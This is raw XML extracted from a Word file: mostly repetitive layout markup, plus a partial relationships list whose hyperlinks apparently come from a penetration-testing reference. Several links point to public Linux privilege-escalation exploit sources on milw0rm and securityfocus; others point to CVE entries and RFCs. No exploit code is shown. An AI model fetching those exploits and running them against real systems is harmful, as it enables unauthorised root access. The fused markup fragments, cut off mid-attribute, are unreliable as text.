            <w:div w:id="1259019709">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="289552133">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2313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5691">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="703599070">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2033190821">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="249628729">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1553998797">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1968392296">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="5542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6008">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1913157794">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="513228404">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1074620694">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="19402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0030">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="613753348">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="695159924">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1338846252">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="704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7578">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0">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1811750589">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="452330255">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="18543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5550">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1762599451">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1894807376">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="437333345">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1603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2107">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1305888232">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="302851981">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="92750263">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="10556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14661">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1731078000">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2100785059">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="858157481">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="816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4284">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="212428130">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="178660792">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2038775225">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2028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1900">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="506407462">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2074162597">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="523903252">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="43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91375">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1424255844">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1957053313">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="695736381">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="4281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rack.org/issues.html?issue=66&amp;id=9" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0xdeadbeef.info/exploits/raptor_prctl.c" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc5737" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kb.cert.org/vuls/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="news://nntp.aioe.org" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0077" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1235" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.org/0607-exploits/h00lyshit.c" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/bid/25774" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/exploits/8572" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc5735" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc1918" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ripe.net/whois/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/1397" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/binfmt_elf.c" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0077" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1235" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0xdeadbeef.info/exploits/raptor_prctl2.c" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0xdeadbeef.info/exploits/raptor_prctl2.c" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2451" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/exploits/8369" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/8478" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc3171" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.samspade.org" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="news://news.grc.com" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/1397" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/binfmt_elf.c" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3626" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0xdeadbeef.info/exploits/raptor_prctl2.c" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId139" 